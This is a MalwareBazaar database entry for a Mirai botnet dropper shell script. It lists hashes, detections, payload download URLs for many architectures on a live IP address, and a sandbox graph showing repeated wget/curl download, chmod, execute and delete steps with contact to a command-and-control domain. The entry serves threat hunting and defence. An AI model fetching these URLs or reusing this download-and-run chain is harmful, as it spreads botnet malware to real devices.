MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 2e0bd5206319d496d982b1cd36c8e181bc99986156fc529d24e47eb913d6ed18. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 7


Intelligence 7 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 2e0bd5206319d496d982b1cd36c8e181bc99986156fc529d24e47eb913d6ed18
SHA3-384 hash: de30ae657890a6ea512ec3ed074c123e760a51a46a55e1c5d187fb11442a8f0d899afd44db4405190fcecc0bf6d9cd53
SHA1 hash: aae98581c60c603a2aa477db1a5833d4dc367e7a
MD5 hash: 0a53d9fcd16b547366cd8ee9007e858e
humanhash: uranus-river-river-earth
File name:1.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:3'374 bytes
First seen:2025-06-24 10:04:14 UTC
Last seen:Never
File type: sh
MIME type:text/x-shellscript
ssdeep 24:ItBLJZsBW+bhBZvkBySlfBw4msBsMTBKuKGgJBzh6BEUnLBEuENIpKksBW+MEBo7:i69Up3PoX1i7LuJRfco/BgJsDk
TLSH T162613DF6134247339DEA8EA376A884046185809B94CE5FB99BFC74B68C4CEC9FC46653
Magika shell
Reporter abuse_ch
Tags:mirai sh
URLMalware sample (SHA256 hash)SignatureTags
http://196.251.117.162/00101010101001/morte.x865ed1b9ac972a32ccd8e338e37d34e0d8dda1470054c8e65ae8973d5676e67e05 Miraielf mirai ua-wget
http://196.251.117.162/00101010101001/morte.mipsad0014f7c3e604337ddc19ef434b8026e712d03400cec2b7c10c9c5617d16a81 Miraimirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.arc7b6bba4e96e466269dd67e803f36e9902228e565d19ff96697c9a9591f6f1d45 Miraimirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.i468n/an/an/a
http://196.251.117.162/00101010101001/morte.i6864c429ba34ce795e5f6d7cf151889caa9221c8fe6910b52312fe612addda6498b MiraiCoinMiner mirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.x86_64e577e2fba99280a6bfb5abd75048d8371d2ab9637d1c2a74b95155e906677817 Miraimirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.mpsl5df2b5357b42bbaf21309d1695ee1ff5e67b29a99682e63671e466d24d9e04e2 Miraimirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.arme1cb2eee5c69a0c80198336de508ca901a9e70678f9b2ae291d7781a6bdee794 Miraimirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.arm5e28b4a608313570071e74495580493ec59567e4971c44e8e44c11b6b4f49dc06 Miraimirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.arm661b7c859316ea98f83307d221ebb0200002399cc6ec182371e49829133d12bf4 Miraimirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.arm71d7c1cf868a753537c94c6f3f8fc374311b370ad42c8efcab33703d2a1408fc1 Miraimirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.ppc856e9cb5636752694313199f4c80a7a0577a50420e2bd7b3f6ee2252ab08345e MiraiCoinMiner mirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.spc858ac66c2df8bc22074efffe1e278e4af1f8a50421aa6b3549cb8fb58479d53e Miraimirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.m68kfed25a810ff084957f4cf11384b377862414c27e0496244862a51e408db0c342 Miraimirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.sh48a5139d6dc5ffb22c4142d8c7699e99574cd9360537a0aaa73e87828fe8bc567 Miraimirai opendir ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
70
Origin country :
DE DE
Vendor Threat Intelligence
Detection(s):
Sanesecurity.Malware.30790.LX.BOT.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-29.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-6.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
99.9%
Link:
https://cyber-fortress.com/docs/result/index.php?id=685a782a32ed47a3a8d6aef7linux22vpnfull_triage
Tags:
n/a
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/41f1c656-3517-4f54-94e9-5509b3c9bca6
Behavior Graph:
Download SVG
%3 guuid=8a32ab3d-1c00-0000-cfa6-26db280b0000 pid=2856 /usr/bin/sudo guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863 /tmp/sample.bin guuid=8a32ab3d-1c00-0000-cfa6-26db280b0000 pid=2856->guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863 execve guuid=2abb7f3f-1c00-0000-cfa6-26db310b0000 pid=2865 /usr/bin/cp guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=2abb7f3f-1c00-0000-cfa6-26db310b0000 pid=2865 execve guuid=6fa91b41-1c00-0000-cfa6-26db360b0000 pid=2870 /usr/bin/wget net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=6fa91b41-1c00-0000-cfa6-26db360b0000 pid=2870 execve guuid=a11dcb48-1c00-0000-cfa6-26db4d0b0000 pid=2893 /usr/bin/curl net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=a11dcb48-1c00-0000-cfa6-26db4d0b0000 pid=2893 execve guuid=f3f6b151-1c00-0000-cfa6-26db5c0b0000 pid=2908 /usr/bin/chmod guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=f3f6b151-1c00-0000-cfa6-26db5c0b0000 pid=2908 execve guuid=001c1052-1c00-0000-cfa6-26db5e0b0000 pid=2910 /tmp/morte.x86 net guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=001c1052-1c00-0000-cfa6-26db5e0b0000 pid=2910 execve guuid=0f579d7f-1d00-0000-cfa6-26db770d0000 pid=3447 /usr/bin/rm delete-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=0f579d7f-1d00-0000-cfa6-26db770d0000 pid=3447 execve guuid=44b9f17f-1d00-0000-cfa6-26db790d0000 pid=3449 /usr/bin/wget net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=44b9f17f-1d00-0000-cfa6-26db790d0000 pid=3449 execve guuid=5e291885-1d00-0000-cfa6-26db870d0000 pid=3463 /usr/bin/curl net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=5e291885-1d00-0000-cfa6-26db870d0000 pid=3463 execve guuid=5ddbe39d-1d00-0000-cfa6-26dbba0d0000 pid=3514 /usr/bin/chmod guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=5ddbe39d-1d00-0000-cfa6-26dbba0d0000 pid=3514 execve guuid=71ef7d9e-1d00-0000-cfa6-26dbbc0d0000 pid=3516 /usr/bin/bash guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=71ef7d9e-1d00-0000-cfa6-26dbbc0d0000 pid=3516 clone guuid=66d14e9f-1d00-0000-cfa6-26dbc00d0000 pid=3520 /usr/bin/rm delete-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=66d14e9f-1d00-0000-cfa6-26dbc00d0000 pid=3520 execve guuid=a2bcd29f-1d00-0000-cfa6-26dbc10d0000 pid=3521 /usr/bin/wget net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=a2bcd29f-1d00-0000-cfa6-26dbc10d0000 pid=3521 execve guuid=a6e272a6-1d00-0000-cfa6-26dbcf0d0000 pid=3535 /usr/bin/curl net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=a6e272a6-1d00-0000-cfa6-26dbcf0d0000 pid=3535 execve guuid=f2ddcdb1-1d00-0000-cfa6-26dbdb0d0000 pid=3547 /usr/bin/chmod guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=f2ddcdb1-1d00-0000-cfa6-26dbdb0d0000 pid=3547 execve guuid=10e42db2-1d00-0000-cfa6-26dbdc0d0000 pid=3548 /usr/bin/bash guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=10e42db2-1d00-0000-cfa6-26dbdc0d0000 pid=3548 clone guuid=4540c4b2-1d00-0000-cfa6-26dbe10d0000 pid=3553 /usr/bin/rm delete-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=4540c4b2-1d00-0000-cfa6-26dbe10d0000 pid=3553 execve guuid=4f46ecb3-1d00-0000-cfa6-26dbe40d0000 pid=3556 /usr/bin/wget net send-data guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=4f46ecb3-1d00-0000-cfa6-26dbe40d0000 pid=3556 execve guuid=0377cbb9-1d00-0000-cfa6-26dbf40d0000 pid=3572 /usr/bin/curl net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=0377cbb9-1d00-0000-cfa6-26dbf40d0000 pid=3572 execve guuid=dc3888bf-1d00-0000-cfa6-26db060e0000 pid=3590 /usr/bin/chmod guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=dc3888bf-1d00-0000-cfa6-26db060e0000 pid=3590 execve guuid=f838d3bf-1d00-0000-cfa6-26db080e0000 pid=3592 /usr/bin/bash guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=f838d3bf-1d00-0000-cfa6-26db080e0000 pid=3592 clone guuid=8f5202c0-1d00-0000-cfa6-26db0a0e0000 pid=3594 /usr/bin/rm delete-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=8f5202c0-1d00-0000-cfa6-26db0a0e0000 pid=3594 execve guuid=5c8375c0-1d00-0000-cfa6-26db0c0e0000 pid=3596 /usr/bin/wget net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=5c8375c0-1d00-0000-cfa6-26db0c0e0000 pid=3596 execve guuid=aea7f2c4-1d00-0000-cfa6-26db190e0000 pid=3609 /usr/bin/curl net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=aea7f2c4-1d00-0000-cfa6-26db190e0000 pid=3609 execve guuid=8c7129ca-1d00-0000-cfa6-26db290e0000 pid=3625 /usr/bin/chmod guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=8c7129ca-1d00-0000-cfa6-26db290e0000 pid=3625 execve guuid=5aad6eca-1d00-0000-cfa6-26db2b0e0000 pid=3627 /tmp/morte.i686 net guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=5aad6eca-1d00-0000-cfa6-26db2b0e0000 pid=3627 execve guuid=1f615842-1e00-0000-cfa6-26db980f0000 pid=3992 /usr/bin/rm delete-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=1f615842-1e00-0000-cfa6-26db980f0000 pid=3992 execve guuid=ab51ce42-1e00-0000-cfa6-26db990f0000 pid=3993 /usr/bin/wget net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=ab51ce42-1e00-0000-cfa6-26db990f0000 pid=3993 execve guuid=98f0a648-1e00-0000-cfa6-26dba90f0000 pid=4009 /usr/bin/curl net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=98f0a648-1e00-0000-cfa6-26dba90f0000 pid=4009 execve guuid=a03ae250-1e00-0000-cfa6-26dbbf0f0000 pid=4031 /usr/bin/chmod guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=a03ae250-1e00-0000-cfa6-26dbbf0f0000 pid=4031 execve guuid=25d35151-1e00-0000-cfa6-26dbc10f0000 pid=4033 /tmp/morte.x86_64 mprotect-exec net guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=25d35151-1e00-0000-cfa6-26dbc10f0000 pid=4033 execve guuid=d3542ac9-1e00-0000-cfa6-26db61110000 pid=4449 /usr/bin/rm delete-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=d3542ac9-1e00-0000-cfa6-26db61110000 pid=4449 execve guuid=98a56ac9-1e00-0000-cfa6-26db63110000 pid=4451 /usr/bin/wget net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=98a56ac9-1e00-0000-cfa6-26db63110000 pid=4451 execve guuid=532984cf-1e00-0000-cfa6-26db7c110000 pid=4476 /usr/bin/curl net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=532984cf-1e00-0000-cfa6-26db7c110000 pid=4476 execve guuid=62af83d4-1e00-0000-cfa6-26db92110000 pid=4498 /usr/bin/chmod guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=62af83d4-1e00-0000-cfa6-26db92110000 pid=4498 execve guuid=2433f6d4-1e00-0000-cfa6-26db94110000 pid=4500 /usr/bin/bash guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=2433f6d4-1e00-0000-cfa6-26db94110000 pid=4500 clone guuid=b64e7dd5-1e00-0000-cfa6-26db99110000 pid=4505 /usr/bin/rm delete-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=b64e7dd5-1e00-0000-cfa6-26db99110000 pid=4505 execve guuid=39f084d9-1e00-0000-cfa6-26dba9110000 pid=4521 /usr/bin/wget net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=39f084d9-1e00-0000-cfa6-26dba9110000 pid=4521 execve guuid=7cfb07df-1e00-0000-cfa6-26dbb4110000 pid=4532 /usr/bin/curl net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=7cfb07df-1e00-0000-cfa6-26dbb4110000 pid=4532 execve guuid=63216c09-1f00-0000-cfa6-26dbb6110000 pid=4534 /usr/bin/chmod guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=63216c09-1f00-0000-cfa6-26dbb6110000 pid=4534 execve guuid=2b99bf09-1f00-0000-cfa6-26dbb7110000 pid=4535 /usr/bin/bash guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=2b99bf09-1f00-0000-cfa6-26dbb7110000 pid=4535 clone guuid=fa54770a-1f00-0000-cfa6-26dbbb110000 pid=4539 /usr/bin/rm delete-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=fa54770a-1f00-0000-cfa6-26dbbb110000 pid=4539 execve guuid=1c72c00a-1f00-0000-cfa6-26dbbf110000 pid=4543 /usr/bin/wget net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=1c72c00a-1f00-0000-cfa6-26dbbf110000 pid=4543 execve guuid=16c41710-1f00-0000-cfa6-26dbcd110000 pid=4557 /usr/bin/curl net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=16c41710-1f00-0000-cfa6-26dbcd110000 pid=4557 execve guuid=95cc3f15-1f00-0000-cfa6-26dbe4110000 pid=4580 /usr/bin/chmod guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=95cc3f15-1f00-0000-cfa6-26dbe4110000 pid=4580 execve guuid=9aceaa15-1f00-0000-cfa6-26dbe8110000 pid=4584 /usr/bin/bash guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=9aceaa15-1f00-0000-cfa6-26dbe8110000 pid=4584 clone guuid=fbc1c416-1f00-0000-cfa6-26dbee110000 pid=4590 /usr/bin/rm delete-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=fbc1c416-1f00-0000-cfa6-26dbee110000 pid=4590 execve guuid=9640491d-1f00-0000-cfa6-26db0f120000 pid=4623 /usr/bin/wget net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=9640491d-1f00-0000-cfa6-26db0f120000 pid=4623 execve guuid=ec5f2c21-1f00-0000-cfa6-26db20120000 pid=4640 /usr/bin/curl net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=ec5f2c21-1f00-0000-cfa6-26db20120000 pid=4640 execve guuid=636c6526-1f00-0000-cfa6-26db36120000 pid=4662 /usr/bin/chmod guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=636c6526-1f00-0000-cfa6-26db36120000 pid=4662 execve guuid=e459bf26-1f00-0000-cfa6-26db38120000 pid=4664 /usr/bin/bash guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=e459bf26-1f00-0000-cfa6-26db38120000 pid=4664 clone guuid=d8b92a36-1f00-0000-cfa6-26db3c120000 pid=4668 /usr/bin/rm delete-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=d8b92a36-1f00-0000-cfa6-26db3c120000 pid=4668 execve guuid=ffe98936-1f00-0000-cfa6-26db3e120000 pid=4670 /usr/bin/wget net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=ffe98936-1f00-0000-cfa6-26db3e120000 pid=4670 execve guuid=33117d3c-1f00-0000-cfa6-26db4c120000 pid=4684 /usr/bin/curl net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=33117d3c-1f00-0000-cfa6-26db4c120000 pid=4684 execve guuid=a67d5843-1f00-0000-cfa6-26db69120000 pid=4713 /usr/bin/chmod guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=a67d5843-1f00-0000-cfa6-26db69120000 pid=4713 execve guuid=fbd0cc43-1f00-0000-cfa6-26db6b120000 pid=4715 /usr/bin/bash guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=fbd0cc43-1f00-0000-cfa6-26db6b120000 pid=4715 clone guuid=edcd8844-1f00-0000-cfa6-26db70120000 pid=4720 /usr/bin/rm delete-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=edcd8844-1f00-0000-cfa6-26db70120000 pid=4720 execve guuid=53e26846-1f00-0000-cfa6-26db73120000 pid=4723 /usr/bin/wget net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=53e26846-1f00-0000-cfa6-26db73120000 pid=4723 execve guuid=7580a14b-1f00-0000-cfa6-26db8b120000 pid=4747 /usr/bin/curl net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=7580a14b-1f00-0000-cfa6-26db8b120000 pid=4747 execve guuid=46c56251-1f00-0000-cfa6-26db9d120000 pid=4765 /usr/bin/chmod guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=46c56251-1f00-0000-cfa6-26db9d120000 pid=4765 execve guuid=d73fc051-1f00-0000-cfa6-26dba1120000 pid=4769 /usr/bin/bash guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=d73fc051-1f00-0000-cfa6-26dba1120000 pid=4769 clone guuid=97989352-1f00-0000-cfa6-26dba6120000 pid=4774 /usr/bin/rm delete-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=97989352-1f00-0000-cfa6-26dba6120000 pid=4774 execve guuid=d1d0f452-1f00-0000-cfa6-26dba8120000 pid=4776 /usr/bin/wget net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=d1d0f452-1f00-0000-cfa6-26dba8120000 pid=4776 execve guuid=cea8fd5a-1f00-0000-cfa6-26dbc2120000 pid=4802 /usr/bin/curl net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=cea8fd5a-1f00-0000-cfa6-26dbc2120000 pid=4802 execve guuid=01f72962-1f00-0000-cfa6-26dbd4120000 pid=4820 /usr/bin/chmod guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=01f72962-1f00-0000-cfa6-26dbd4120000 pid=4820 execve guuid=9f9a7062-1f00-0000-cfa6-26dbd6120000 pid=4822 /usr/bin/bash guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=9f9a7062-1f00-0000-cfa6-26dbd6120000 pid=4822 clone guuid=b3423663-1f00-0000-cfa6-26dbdb120000 pid=4827 /usr/bin/rm delete-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=b3423663-1f00-0000-cfa6-26dbdb120000 pid=4827 execve guuid=a55f9d63-1f00-0000-cfa6-26dbdd120000 pid=4829 /usr/bin/wget net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=a55f9d63-1f00-0000-cfa6-26dbdd120000 pid=4829 execve guuid=e3170e69-1f00-0000-cfa6-26dbef120000 pid=4847 /usr/bin/curl net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=e3170e69-1f00-0000-cfa6-26dbef120000 pid=4847 execve guuid=d8c10e70-1f00-0000-cfa6-26db0c130000 pid=4876 /usr/bin/chmod guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=d8c10e70-1f00-0000-cfa6-26db0c130000 pid=4876 execve guuid=39726070-1f00-0000-cfa6-26db0e130000 pid=4878 /usr/bin/bash guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=39726070-1f00-0000-cfa6-26db0e130000 pid=4878 clone guuid=01792071-1f00-0000-cfa6-26db12130000 pid=4882 /usr/bin/rm delete-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=01792071-1f00-0000-cfa6-26db12130000 pid=4882 execve guuid=e2d79a71-1f00-0000-cfa6-26db14130000 pid=4884 /usr/bin/wget net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=e2d79a71-1f00-0000-cfa6-26db14130000 pid=4884 execve guuid=cdafd276-1f00-0000-cfa6-26db28130000 pid=4904 /usr/bin/curl net send-data write-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=cdafd276-1f00-0000-cfa6-26db28130000 pid=4904 execve guuid=4859b77d-1f00-0000-cfa6-26db41130000 pid=4929 /usr/bin/chmod guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=4859b77d-1f00-0000-cfa6-26db41130000 pid=4929 execve guuid=8e60f77d-1f00-0000-cfa6-26db42130000 pid=4930 /usr/bin/bash guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=8e60f77d-1f00-0000-cfa6-26db42130000 pid=4930 clone guuid=3c96a87e-1f00-0000-cfa6-26db48130000 pid=4936 /usr/bin/rm delete-file guuid=b4df2d3f-1c00-0000-cfa6-26db2f0b0000 pid=2863->guuid=3c96a87e-1f00-0000-cfa6-26db48130000 pid=4936 execve 0c3b1b7f-3118-5433-8db0-0c521669c849 196.251.117.162:80 guuid=6fa91b41-1c00-0000-cfa6-26db360b0000 pid=2870->0c3b1b7f-3118-5433-8db0-0c521669c849 send: 154B guuid=a11dcb48-1c00-0000-cfa6-26db4d0b0000 pid=2893->0c3b1b7f-3118-5433-8db0-0c521669c849 send: 103B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=001c1052-1c00-0000-cfa6-26db5e0b0000 pid=2910->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=60b7ed52-1c00-0000-cfa6-26db600b0000 pid=2912 /tmp/morte.x86 guuid=001c1052-1c00-0000-cfa6-26db5e0b0000 pid=2910->guuid=60b7ed52-1c00-0000-cfa6-26db600b0000 pid=2912 clone guuid=ab838f7f-1d00-0000-cfa6-26db750d0000 pid=3445 /tmp/morte.x86 guuid=001c1052-1c00-0000-cfa6-26db5e0b0000 pid=2910->guuid=ab838f7f-1d00-0000-cfa6-26db750d0000 pid=3445 clone guuid=6273937f-1d00-0000-cfa6-26db760d0000 pid=3446 /tmp/morte.x86 net send-data zombie guuid=001c1052-1c00-0000-cfa6-26db5e0b0000 pid=2910->guuid=6273937f-1d00-0000-cfa6-26db760d0000 pid=3446 clone guuid=0ac1f752-1c00-0000-cfa6-26db610b0000 pid=2913 /tmp/morte.x86 guuid=60b7ed52-1c00-0000-cfa6-26db600b0000 pid=2912->guuid=0ac1f752-1c00-0000-cfa6-26db610b0000 pid=2913 clone guuid=f4270f53-1c00-0000-cfa6-26db630b0000 pid=2915 /tmp/morte.x86 dns net send-data zombie guuid=60b7ed52-1c00-0000-cfa6-26db600b0000 pid=2912->guuid=f4270f53-1c00-0000-cfa6-26db630b0000 pid=2915 clone guuid=f4270f53-1c00-0000-cfa6-26db630b0000 pid=2915->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 64B 42990ff2-8d05-5781-a3b1-955a2b52eab7 jbvpshosti.com:12121 guuid=f4270f53-1c00-0000-cfa6-26db630b0000 pid=2915->42990ff2-8d05-5781-a3b1-955a2b52eab7 send: 30B guuid=6273937f-1d00-0000-cfa6-26db760d0000 pid=3446->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 160B 56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 jbvpshosti.com:80 guuid=6273937f-1d00-0000-cfa6-26db760d0000 pid=3446->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 15B guuid=44b9f17f-1d00-0000-cfa6-26db790d0000 pid=3449->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 155B guuid=5e291885-1d00-0000-cfa6-26db870d0000 pid=3463->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 104B guuid=a2bcd29f-1d00-0000-cfa6-26dbc10d0000 pid=3521->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 154B guuid=a6e272a6-1d00-0000-cfa6-26dbcf0d0000 pid=3535->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 103B guuid=4f46ecb3-1d00-0000-cfa6-26dbe40d0000 pid=3556->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 155B guuid=0377cbb9-1d00-0000-cfa6-26dbf40d0000 pid=3572->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 104B guuid=5c8375c0-1d00-0000-cfa6-26db0c0e0000 pid=3596->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 155B guuid=aea7f2c4-1d00-0000-cfa6-26db190e0000 pid=3609->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 104B guuid=5aad6eca-1d00-0000-cfa6-26db2b0e0000 pid=3627->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con f77ebf5e-2af7-5b09-86f4-388588a8b445 0.0.0.0:12121 guuid=5aad6eca-1d00-0000-cfa6-26db2b0e0000 pid=3627->f77ebf5e-2af7-5b09-86f4-388588a8b445 con guuid=ab51ce42-1e00-0000-cfa6-26db990f0000 pid=3993->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 157B guuid=98f0a648-1e00-0000-cfa6-26dba90f0000 pid=4009->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 106B guuid=25d35151-1e00-0000-cfa6-26dbc10f0000 pid=4033->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=25d35151-1e00-0000-cfa6-26dbc10f0000 pid=4033->f77ebf5e-2af7-5b09-86f4-388588a8b445 con guuid=98a56ac9-1e00-0000-cfa6-26db63110000 pid=4451->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 155B guuid=532984cf-1e00-0000-cfa6-26db7c110000 pid=4476->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 104B guuid=39f084d9-1e00-0000-cfa6-26dba9110000 pid=4521->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 154B guuid=7cfb07df-1e00-0000-cfa6-26dbb4110000 pid=4532->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 103B guuid=1c72c00a-1f00-0000-cfa6-26dbbf110000 pid=4543->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 155B guuid=16c41710-1f00-0000-cfa6-26dbcd110000 pid=4557->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 104B guuid=9640491d-1f00-0000-cfa6-26db0f120000 pid=4623->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 155B guuid=ec5f2c21-1f00-0000-cfa6-26db20120000 pid=4640->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 104B guuid=ffe98936-1f00-0000-cfa6-26db3e120000 pid=4670->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 155B guuid=33117d3c-1f00-0000-cfa6-26db4c120000 pid=4684->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 104B guuid=53e26846-1f00-0000-cfa6-26db73120000 pid=4723->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 154B 